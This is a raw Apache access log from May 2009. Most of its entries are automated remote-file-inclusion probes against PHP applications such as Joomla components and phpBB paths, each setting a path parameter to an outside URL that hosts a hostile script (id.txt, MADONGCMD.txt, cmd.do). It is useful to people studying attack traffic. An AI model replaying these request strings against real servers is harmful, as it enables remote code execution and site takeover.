77.221.130.6 - - [12/May/2009:01:31:17 -0400] "GET /logs/access_log.Q108100700//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.6 - - [12/May/2009:01:31:17 -0400] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
77.221.130.6 - - [12/May/2009:01:31:25 -0400] "GET /logs/access_log.Q108112400//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
193.34.167.192 - - [12/May/2009:01:31:47 -0400] "GET /logs/access_log.Q108100900//include/print_category.php?setup[use_category]=1&dir=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:31:47 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:31:47 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.808"
209.59.12.99 - - [12/May/2009:01:32:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.207.218 - - [12/May/2009:01:32:30 -0400] "GET /logs/access_log.Q109050700%20%20/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
85.17.207.218 - - [12/May/2009:01:33:12 -0400] "GET /logs/access_log.Q109012500%20%20/samplelinksdir.php?path[docroot]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
123.143.98.5 - - [12/May/2009:01:33:35 -0400] "GET /logs/access_log.Q108110200//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:35 -0400] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:35 -0400] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:36 -0400] "GET /logs/access_log.Q108110200//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:36 -0400] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:36 -0400] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:38 -0400] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:38 -0400] "GET /logs/access_log.Q108110200//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
123.143.98.5 - - [12/May/2009:01:33:38 -0400] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
210.143.109.236 - - [12/May/2009:01:33:43 -0400] "GET /logs/access_log.Q108092600%20/phphtml.php?htmlclass_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:33:43 -0400] "GET /phphtml.php?htmlclass_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:33:43 -0400] "GET /logs/phphtml.php?htmlclass_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.65"
217.199.222.19 - - [12/May/2009:01:34:04 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:34:04 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:34:04 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
62.26.219.92 - - [12/May/2009:01:34:14 -0400] "GET /logs/error_log.Q108061700/includes/stats.inc.php?prefix=http://www.kri-perth.org.au/Events/EventImage7.jpg?? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
62.26.219.92 - - [12/May/2009:01:34:14 -0400] "GET /includes/stats.inc.php?prefix=http://www.kri-perth.org.au/Events/EventImage7.jpg?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
88.191.103.144 - - [12/May/2009:01:34:14 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
62.26.219.92 - - [12/May/2009:01:34:14 -0400] "GET /logs/includes/stats.inc.php?prefix=http://www.kri-perth.org.au/Events/EventImage7.jpg?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
202.21.134.11 - - [12/May/2009:01:34:31 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L005471417B00B900BFFC05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
69.172.126.16 - - [12/May/2009:01:34:33 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
202.21.134.11 - - [12/May/2009:01:34:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
88.191.103.144 - - [12/May/2009:01:34:40 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
121.165.73.157 - - [12/May/2009:01:34:41 -0400] "GET /logs/access_log.Q108100100//streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 289 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.165.73.157 - - [12/May/2009:01:34:42 -0400] "GET //streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 262 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
123.143.98.5 - - [12/May/2009:01:34:56 -0400] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:01:34:56 -0400] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
123.143.98.5 - - [12/May/2009:01:34:56 -0400] "GET /logs/access_log.Q108110200//blend_data/blend_common.php?phpbb_root_path=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
74.53.70.114 - - [12/May/2009:01:35:02 -0400] "GET /logs/access_log.Q108092600%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:35:03 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
217.199.222.19 - - [12/May/2009:01:35:03 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:35:03 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.199.222.19 - - [12/May/2009:01:35:03 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:35:05 -0400] "GET /index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:35:05 -0400] "GET /logs/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:01:35:05 -0400] "GET /logs/access_log.Q108121300/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
210.143.109.236 - - [12/May/2009:01:35:14 -0400] "GET /logs/access_log.Q108090100/phphtml.php?htmlclass_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
210.143.109.236 - - [12/May/2009:01:35:15 -0400] "GET /logs/access_log.Q108092600/phphtml.php?htmlclass_path=http://80.24.176.145/time//appserv/file.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
217.18.76.16 - - [12/May/2009:01:35:18 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
62.26.219.92 - - [12/May/2009:01:35:21 -0400] "GET /includes/stats.inc.php?prefix=http://www.kri-perth.org.au/Events/EventImage7.jpg?? HTTP/1.1" 404 220 "-" "libwww-perl/5.79"
217.18.76.16 - - [12/May/2009:01:35:23 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
74.53.70.114 - - [12/May/2009:01:35:29 -0400] "GET /logs/access_log.Q108091100%20%20//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:01:35:36 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
121.165.73.157 - - [12/May/2009:01:35:38 -0400] "GET /logs/access_log.Q108100100//streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:01:35:38 -0400] "GET //streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 262 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:01:35:39 -0400] "GET /logs//streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:01:35:53 -0400] "GET /logs/access_log.Q108111600//streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=http://www.atitudepositiva.com.br/images/id.txt?? HTTP/1.1" 404 289 "-" "libwww-perl/5.805"
69.172.126.16 - - [12/May/2009:01:35:54 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
217.18.76.16 - - [12/May/2009:01:35:55 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
58.227.193.198 - - [12/May/2009:01:36:01 -0400] "GET /index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:01:36:01 -0400] "GET /logs/access_log.Q108121300/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.227.193.198 - - [12/May/2009:01:36:01 -0400] "GET /logs/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:36:03 -0400] "GET /logs/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:36:03 -0400] "GET /logs/access_log.Q108121300/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:36:03 -0400] "GET /index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
147.27.14.31 - - [12/May/2009:01:36:08 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.808"
88.84.128.40 - - [12/May/2009:01:36:29 -0400] "GET /logs/access_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
147.27.14.31 - - [12/May/2009:01:36:39 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
209.122.43.130 - - [12/May/2009:01:36:54 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.122.43.130 - - [12/May/2009:01:36:54 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.122.43.130 - - [12/May/2009:01:36:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
209.122.43.130 - - [12/May/2009:01:36:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.84.128.40 - - [12/May/2009:01:36:59 -0400] "GET /logs/error_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/May/2009:01:37:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.160.4.250 - - [12/May/2009:01:37:46 -0400] "GET /logs/access_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:37:46 -0400] "GET /?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:37:47 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 1016 "-" "libwww-perl/5.805"
147.27.14.31 - - [12/May/2009:01:37:49 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
193.34.167.192 - - [12/May/2009:01:37:49 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://iprayedforyoutoday.com/alba.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.808"
217.160.4.250 - - [12/May/2009:01:37:53 -0400] "GET /logs/access_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:37:53 -0400] "GET /?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:37:53 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 1016 "-" "libwww-perl/5.805"
88.84.128.40 - - [12/May/2009:01:38:03 -0400] "GET /logs/error_log.Q108122600/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://parabill.net/components/com_joomlaboard/uploaded/images/avatar/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
217.160.4.250 - - [12/May/2009:01:38:11 -0400] "GET /logs/access_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:11 -0400] "GET /?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:12 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 1016 "-" "libwww-perl/5.805"
58.227.193.198 - - [12/May/2009:01:38:29 -0400] "GET /logs/access_log.Q108121300%20%20/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:38:30 -0400] "GET /logs/access_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:30 -0400] "GET /?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:31 -0400] "GET /logs/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 200 1016 "-" "libwww-perl/5.805"
193.221.119.126 - - [12/May/2009:01:38:33 -0400] "GET /logs/access_log.Q108121300%20%20/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:38:35 -0400] "GET /logs/error_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:37 -0400] "GET /logs/error_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:38:54 -0400] "GET /logs/error_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
217.160.4.250 - - [12/May/2009:01:39:17 -0400] "GET /logs/error_log.Q108100400/?DOCUMENT_ROOT=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
74.53.70.114 - - [12/May/2009:01:41:01 -0400] "GET /logs/access_log.Q108111500//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/statict/xml/copyright.gif?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:41:39 -0400] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:41:39 -0400] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:41:40 -0400] "GET /logs/access_log.Q108100600//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:42:17 -0400] "GET /logs/access_log.Q108090100//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:01:42:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
88.191.103.144 - - [12/May/2009:01:42:49 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:01:42:52 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
69.172.126.16 - - [12/May/2009:01:42:55 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
217.160.4.250 - - [12/May/2009:01:42:56 -0400] "GET /logs/access_log.Q108100400%20%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.172.126.16 - - [12/May/2009:01:42:57 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
217.115.136.12 - - [12/May/2009:01:43:14 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:43:14 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
217.115.136.12 - - [12/May/2009:01:43:14 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://www.xgamex.org/xgamex/id.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
217.160.4.250 - - [12/May/2009:01:44:03 -0400] "GET /logs/error_log.Q108100400%20%20/?DOCUMENT_ROOT=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:01:44:04 -0400] "GET /logs/access_log.Q108121300%20%20/index.php?option=com_smf&Itemid=&mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
217.18.76.16 - - [12/May/2009:01:44:20 -0400] "GET /logs/error_log.Q108101400/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:01:44:21 -0400] "GET /logs/access_log.Q108122500/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
88.191.103.144 - - [12/May/2009:01:44:33 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.825"
217.18.76.16 - - [12/May/2009:01:44:39 -0400] "GET /logs/access_log.Q108092900/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
89.166.50.90 - - [12/May/2009:01:44:43 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.search9.net/config/proxy/cmd.do?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
